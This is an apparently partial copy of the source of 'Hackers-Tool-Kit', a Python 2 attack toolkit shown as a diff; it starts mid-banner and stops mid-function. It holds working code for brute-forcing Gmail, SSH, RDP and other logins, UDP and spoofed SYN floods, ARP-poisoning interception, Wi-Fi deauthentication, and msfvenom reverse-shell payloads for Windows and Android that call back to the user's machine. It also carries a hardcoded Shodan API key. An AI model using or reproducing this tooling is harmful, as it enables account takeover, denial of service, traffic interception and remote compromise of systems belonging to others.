By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arppois : ARP poisoning | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║█████╗██║█████╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + show = 'macchanger -s {0}'.format(k) + os.system(show) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if 